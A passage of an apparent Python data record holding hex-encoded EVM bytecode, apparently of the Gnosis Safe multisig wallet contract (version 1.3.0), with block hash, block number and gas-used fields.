26004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8173ffffffffffffffffffffffffffffffffffffffff16600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614614b55576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303500000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600360008154809291906001900391905055507ff8d49fc529812e9a7c5c50e69c20f0dccc0db8fa95c98bc58cc9a4f1c1299eaf82604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a18060045414614d2457614d2381612c3e565b5b505050565b6040518060400160405280600581526020017f312e332e3000000000000000000000000000000000000000000000000000000081525081565b3073ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614614e03576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f47533033310000000000000000000000000000000000000000000000000000008152506
0200191505060405180910390fd5b565b600080831415614e185760009050614e39565b6000828402905082848281614e2957fe5b0414614e3457600080fd5b809150505b92915050565b60008060008360410260208101860151925060408101860151915060ff60418201870151169350509250925092565b600080828401905083811015614e8357600080fd5b8091505092915050565b6000600180811115614e9b57fe5b836001811115614ea757fe5b1415614ec0576000808551602087018986f49050614ed0565b600080855160208701888a87f190505b95945050505050565b6000807f4a204f620c8c5ccdca3fd54d003badd85ba500436a431f0cbda4f558c93c34c860001b9050805491505090565b600081831015614f1a5781614f1c565b825b905092915050565b600082821115614f3357600080fd5b600082840390508091505092915050565b600080600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614614f815782614f83565b325b9050600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16141561509b57614fed3a8610614fca573a614fcc565b855b614fdf888a614e6e90919063ffffffff16565b614e0590919063ffffffff16565b91508073ffffffffffffffffffffffffffffffffffffffff166108fc839081150290604051600060405180830381858888f19350505050615096576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330313100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b615140565b6150c0856150b2888a614e6e90919063ffffffff16565b614e0590919063ffffffff16565b91506150cd8482846158b4565b61513f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330313200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b5b5095945050505050565b6000600454146151c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8151811115615239576040517f08c379a00000000000000000000
000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60018110156152b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60006001905060005b83518110156155b65760008482815181106152d057fe5b60200260200101519050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16141580156153445750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b801561537c57503073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b80156153b457508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b615426576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614615527576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508092505080806001019150506152b9565b506001600260008373fffffffffff
fffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550825160038190555081600481905550505050565b60007f6c9a6c4a39284e37ed1cf53d337577d14212a4870fb976a4366c693b939918d560001b90508181555050565b600073ffffffffffffffffffffffffffffffffffffffff1660016000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461577b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6001806000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16146158b05761583d8260008360015a614e8d565b6158af576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330303000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b5b5050565b60008063a9059cbb8484604051602401808373ffffffffffffffffffffffffffffffffffffffff168152602001828152602001925050506040516020818303038152906040529060e01b6020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff83818316178352505050509050602060008251602084016000896127105a03f13d6000811461595b5760208114615963576000935061596e565b81935061596e565b600051158215171593505b505050939250505056fea26469706673582212203874bcf92e1722cc7bfa0cef1a0985cf0dc3485ba0663db3747ccdf1605df53464736f6c6343000706003
3"
),
},
"blockHash": "0x4160d3b92f3678386a108e0838016dd3010ba12389712a30f2b017d33799d05e",
"blockNumber": 12504268,
"result": {
"gasUsed": 4619079,
"code": HexBytes(
"0x6080604052600436106101dc5760003560e01c8063affed0e011610102578063e19a9dd911610095578063f08a032311610064578063f08a032314611647578063f698da2514611698578063f8dc5dd9146116c3578063ffa1ad741461173e57610231565b8063e19a9dd91461139b578063e318b52b146113ec578063e75235b81461147d578063e86637db146114a857610231565b8063cc2f8452116100d1578063cc2f8452146110e8578063d4d9bdcd146111b5578063d8d11f78146111f0578063e009cfde1461132a57610231565b8063affed0e014610d94578063b4faba0914610dbf578063b63e800d14610ea7578063c4ca3a9c1461101757610231565b80635624b25b1161017a5780636a761202116101495780636a761202146109945780637d83297414610b50578063934f3a1114610bbf578063a0e67e2b14610d2857610231565b80635624b25b146107fb5780635ae6bd37146108b9578063610b592514610908578063694e80c31461095957610231565b80632f54bf6e116101b65780632f54bf6e146104d35780633408e4701461053a578063468721a7146105655780635229073f1461067a57610231565b80630d582f131461029e57806312fb68e0146102f95780632d9ad53d1461046c57610231565b36610231573373ffffffffffffffffffffffffffffffffffffffff167f3d0ce9bfc3ed7d6862dbb28b2dea94561fe714a1b4d019aa8af39730d1ad7c3d346040518082815260200191505060405180910390a2005b34801561023d57600080fd5b5060007f6c9a6c4a39284e37ed1cf53d337577d14212a4870fb976a4366c693b939918d560001b905080548061027257600080f35b36600080373360601b365260008060143601600080855af13d6000803e80610299573d6000fd5b3d6000f35b3480156102aa57600080fd5b506102f7600480360360408110156102c157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506117ce565b005b34801561030557600080fd5b5061046a6004803603608081101561031c57600080fd5b81019080803590602001909291908035906020019064010000000081111561034357600080fd5b82018360208201111561035557600080fd5b8035906020019184600183028401116401000000008311171561037757600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290803590602001906401000000008111156103da57600080fd5b8201836020820111156103e
c57600080fd5b8035906020019184600183028401116401000000008311171561040e57600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050919291929080359060200190929190505050611bbe565b005b34801561047857600080fd5b506104bb6004803603602081101561048f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612440565b60405180821515815260200191505060405180910390f35b3480156104df57600080fd5b50610522600480360360208110156104f657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612512565b60405180821515815260200191505060405180910390f35b34801561054657600080fd5b5061054f6125e4565b6040518082815260200191505060405180910390f35b34801561057157600080fd5b506106626004803603608081101561058857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803590602001906401000000008111156105cf57600080fd5b8201836020820111156105e157600080fd5b8035906020019184600183028401116401000000008311171561060357600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290803560ff1690602001909291905050506125f1565b60405180821515815260200191505060405180910390f35b34801561068657600080fd5b506107776004803603608081101561069d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803590602001906401000000008111156106e457600080fd5b8201836020820111156106f657600080fd5b8035906020019184600183028401116401000000008311171561071857600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290803560ff1690602001909291905050506127d7565b60405180831515815260200180602001828103825283818151815260200191508051906020019080838360005b838110156107bf5780820151818401526020810190506107a4565b50505050905090810190601f16801
56107ec5780820380516001836020036101000a031916815260200191505b50935050505060405180910390f35b34801561080757600080fd5b5061083e6004803603604081101561081e57600080fd5b81019080803590602001909291908035906020019092919050505061280d565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561087e578082015181840152602081019050610863565b50505050905090810190601f1680156108ab5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b3480156108c557600080fd5b506108f2600480360360208110156108dc57600080fd5b8101908080359060200190929190505050612894565b6040518082815260200191505060405180910390f35b34801561091457600080fd5b506109576004803603602081101561092b57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506128ac565b005b34801561096557600080fd5b506109926004803603602081101561097c57600080fd5b8101908080359060200190929190505050612c3e565b005b610b3860048036036101408110156109ab57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803590602001906401000000008111156109f257600080fd5b820183602082011115610a0457600080fd5b80359060200191846001830284011164010000000083111715610a2657600080fd5b9091929391929390803560ff169060200190929190803590602001909291908035906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190640100000000811115610ab257600080fd5b820183602082011115610ac457600080fd5b80359060200191846001830284011164010000000083111715610ae657600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290505050612d78565b60405180821515815260200191505060405180910390f35b348015610b5c57600080fd5b50610ba960048036036040811015610b7357600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506132b5565b6040518082815260200191505
060405180910390f35b348015610bcb57600080fd5b50610d2660048036036060811015610be257600080fd5b810190808035906020019092919080359060200190640100000000811115610c0957600080fd5b820183602082011115610c1b57600080fd5b80359060200191846001830284011164010000000083111715610c3d57600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050919291929080359060200190640100000000811115610ca057600080fd5b820183602082011115610cb257600080fd5b80359060200191846001830284011164010000000083111715610cd457600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f8201169050808301925050505050505091929192905050506132da565b005b348015610d3457600080fd5b50610d3d613369565b6040518080602001828103825283818151815260200191508051906020019060200280838360005b83811015610d80578082015181840152602081019050610d65565b505050509050019250505060405180910390f35b348015610da057600080fd5b50610da9613512565b6040518082815260200191505060405180910390f35b348015610dcb57600080fd5b50610ea560048036036040811015610de257600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190640100000000811115610e1f57600080fd5b820183602082011115610e3157600080fd5b80359060200191846001830284011164010000000083111715610e5357600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290505050613518565b005b348015610eb357600080fd5b506110156004803603610100811015610ecb57600080fd5b8101908080359060200190640100000000811115610ee857600080fd5b820183602082011115610efa57600080fd5b80359060200191846020830284011164010000000083111715610f1c57600080fd5b909192939192939080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190640100000000811115610f6757600080fd5b820183602082011115610f7957600080fd5b80359060200191846001830284011164010000000083111715610f9b57600080fd5b90919
29391929390803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919050505061353a565b005b34801561102357600080fd5b506110d26004803603608081101561103a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291908035906020019064010000000081111561108157600080fd5b82018360208201111561109357600080fd5b803590602001918460018302840111640100000000831117156110b557600080fd5b9091929391929390803560ff1690602001909291905050506136f8565b6040518082815260200191505060405180910390f35b3480156110f457600080fd5b506111416004803603604081101561110b57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050613820565b60405180806020018373ffffffffffffffffffffffffffffffffffffffff168152602001828103825284818151815260200191508051906020019060200280838360005b838110156111a0578082015181840152602081019050611185565b50505050905001935050505060405180910390f35b3480156111c157600080fd5b506111ee600480360360208110156111d857600080fd5b8101908080359060200190929190505050613a12565b005b3480156111fc57600080fd5b50611314600480360361014081101561121457600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291908035906020019064010000000081111561125b57600080fd5b82018360208201111561126d57600080fd5b8035906020019184600183028401116401000000008311171561128f57600080fd5b9091929391929390803560ff169060200190929190803590602001909291908035906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050613bb1565b6040518082815260200191505060405180910390f35b34801561133657600080fd5b506113996004803603604081101561134d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573fffffffffffffffffffffffffffffffffff
fffff169060200190929190505050613bde565b005b3480156113a757600080fd5b506113ea600480360360208110156113be57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613f6f565b005b3480156113f857600080fd5b5061147b6004803603606081101561140f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050613ff3565b005b34801561148957600080fd5b50611492614665565b6040518082815260200191505060405180910390f35b3480156114b457600080fd5b506115cc60048036036101408110156114cc57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291908035906020019064010000000081111561151357600080fd5b82018360208201111561152557600080fd5b8035906020019184600183028401116401000000008311171561154757600080fd5b9091929391929390803560ff169060200190929190803590602001909291908035906020019092919080359060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035906020019092919050505061466f565b6040518080602001828103825283818151815260200191508051906020019080838360005b8381101561160c5780820151818401526020810190506115f1565b50505050905090810190601f1680156116395780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b34801561165357600080fd5b506116966004803603602081101561166a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050614817565b005b3480156116a457600080fd5b506116ad614878565b6040518082815260200191505060405180910390f35b3480156116cf57600080fd5b5061173c600480360360608110156116e657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506148f6565b005b34801561174a57600080fd5b50611753614d29565b60405180806020018281038252838181518152602001915080519
06020019080838360005b83811015611793578082015181840152602081019050611778565b50505050905090810190601f1680156117c05780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6117d6614d62565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141580156118405750600173ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b801561187857503073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b6118ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146119eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60026000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508160026000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600360008154809291906001019
1905055507f9465fa0c962cc76958e6373a993326400c1c94f8be2fe3a952adfa7f60b2ea2682604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a18060045414611bba57611bb981612c3e565b5b5050565b611bd2604182614e0590919063ffffffff16565b82511015611c48576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6000808060008060005b8681101561243457611c648882614e3f565b80945081955082965050505060008460ff16141561206d578260001c9450611c96604188614e0590919063ffffffff16565b8260001c1015611d0e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8751611d2760208460001c614e6e90919063ffffffff16565b1115611d9b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60006020838a01015190508851611dd182611dc360208760001c614e6e90919063ffffffff16565b614e6e90919063ffffffff16565b1115611e45576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60606020848b010190506320c13b0b60e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19168773ffffffffffffffffffffffffffffffffffffffff166320c13b0b8d846040518363ffffffff1660e01b8152600401808060200180602001838103835285818151815260200191508051906020019080838360005b83811015611ee7578082015181840152602081019050611ecc565b50505050905090810190601f168015611f145780820380516001836020036101000a031916815260200191505b50838103825284818151815260200191508051906020019080838360005b83811015611f4d578082015
181840152602081019050611f32565b50505050905090810190601f168015611f7a5780820380516001836020036101000a031916815260200191505b5094505050505060206040518083038186803b158015611f9957600080fd5b505afa158015611fad573d6000803e3d6000fd5b505050506040513d6020811015611fc357600080fd5b81019080805190602001909291905050507bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614612066576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323400000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b50506122b2565b60018460ff161415612181578260001c94508473ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16148061210a57506000600860008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008c81526020019081526020016000205414155b61217c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323500000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6122b1565b601e8460ff1611156122495760018a60405160200180807f19457468657265756d205369676e6564204d6573736167653a0a333200000000815250601c018281526020019150506040516020818303038152906040528051906020012060048603858560405160008152602001604052604051808581526020018460ff1681526020018381526020018281526020019450505050506020604051602081039080840390855afa158015612238573d6000803e3d6000fd5b5050506020604051035194506122b0565b60018a85858560405160008152602001604052604051808581526020018460ff1681526020018381526020018281526020019450505050506020604051602081039080840390855afa1580156122a3573d6000803e3d6000fd5b5050506020604051035194505b5b5b8573ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161180156123795750600073ffffffffffffffffffffffffffffffffffffffff16600260008773ffffffffffffffffffffffffffffffffffffffff1673fffffffffffffffffff
fffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b80156123b25750600173ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b612424576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330323600000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b8495508080600101915050611c52565b50505050505050505050565b60008173ffffffffffffffffffffffffffffffffffffffff16600173ffffffffffffffffffffffffffffffffffffffff161415801561250b5750600073ffffffffffffffffffffffffffffffffffffffff16600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b9050919050565b6000600173ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141580156125dd5750600073ffffffffffffffffffffffffffffffffffffffff16600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b9050919050565b6000804690508091505090565b6000600173ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16141580156126bc5750600073ffffffffffffffffffffffffffffffffffffffff16600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614155b61272e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f47533130340000000000000000000000000
0000000000000000000000000000081525060200191505060405180910390fd5b61273b858585855a614e8d565b9050801561278b573373ffffffffffffffffffffffffffffffffffffffff167f6895c13664aa4f67288b25d7a21d7aaa34916e355fb9b6fae0a139a9085becb860405160405180910390a26127cf565b3373ffffffffffffffffffffffffffffffffffffffff167facd2c8702804128fdb0db2bb49f6d127dd0181c13fd45dbfe16de0930e2bd37560405160405180910390a25b949350505050565b600060606127e7868686866125f1565b915060405160203d0181016040523d81523d6000602083013e8091505094509492505050565b606060006020830267ffffffffffffffff8111801561282b57600080fd5b506040519080825280601f01601f19166020018201604052801561285e5781602001600182028036833780820191505090505b50905060005b8381101561288957808501548060208302602085010152508080600101915050612864565b508091505092915050565b60076020528060005260406000206000915090505481565b6128b4614d62565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415801561291e5750600173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614155b612990576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612a91576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475331303200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60016000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166001600
08373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060016000600173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507fecdf3a3effea5783a3c4c2140e677577666428d44ed9d474a0b3a4c9943f844081604051808273ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390a150565b612c46614d62565b600354811115612cbe576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303100000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b6001811015612d35576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475332303200000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b806004819055507f610f7ff2b304ae8903c3de74c60c6ab1f7d6226b3f52c5161905bb5ad4039c936004546040518082815260200191505060405180910390a150565b6000806000612d928e8e8e8e8e8e8e8e8e8e60055461466f565b905060056000815480929190600101919050555080805190602001209150612dbb8282866132da565b506000612dc6614ed9565b9050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614612fac578073ffffffffffffffffffffffffffffffffffffffff166375f0bb528f8f8f8f8f8f8f8f8f8f8f336040518d63ffffffff1660e01b8152600401808d73ffffffffffffffffffffffffffffffffffffffff1681526020018c8152602001806020018a6001811115612e6957fe5b81526020018981526020018881526020018781526020018673ffffffffffffffffffffffffffffffffffffffff1681526020018573ffffffffffffffffffffffffffffffffffffffff168152602001806020018473ffffffffffffffffffffffffffffffffffffffff16815260200183810383528
d8d82818152602001925080828437600081840152601f19601f820116905080830192505050838103825285818151815260200191508051906020019080838360005b83811015612f3b578082015181840152602081019050612f20565b50505050905090810190601f168015612f685780820380516001836020036101000a031916815260200191505b509e505050505050505050505050505050600060405180830381600087803b158015612f9357600080fd5b505af1158015612fa7573d6000803e3d6000fd5b505050505b6101f4612fd36109c48b01603f60408d0281612fc457fe5b04614f0a90919063ffffffff16565b015a1015613049576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330313000000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60005a90506130b28f8f8f8f8080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050508e60008d146130a7578e6130ad565b6109c45a035b614e8d565b93506130c75a82614f2490919063ffffffff16565b905083806130d6575060008a14155b806130e2575060008814155b613154576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260058152602001807f475330313300000000000000000000000000000000000000000000000000000081525060200191505060405180910390fd5b60008089111561316e5761316b828b8b8b8b614f44565b90505b84156131b8577f442e715f626346e8c54381002da614f62bee8d27386535b2521ec8540898556e8482604051808381526020018281526020019250505060405180910390a16131f8565b7f23428b18acfb3ea64b08dc0c1d296ea9c09702c09083ca5272e64d115b687d238482604051808381526020018281526020019250505060405180910390a15b5050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16146132a4578073ffffffffffffffffffffffffffffffffffffffff16639327136883856040518363ffffffff1660e01b815260040180838152602001821515815260200192505050600060405180830381600087803b15801561328b57600080fd5b505af115801561329f573d6000803e3d6000fd5b505050505b50509b9a5050505050505050505050565b600860205281600052604060002060205
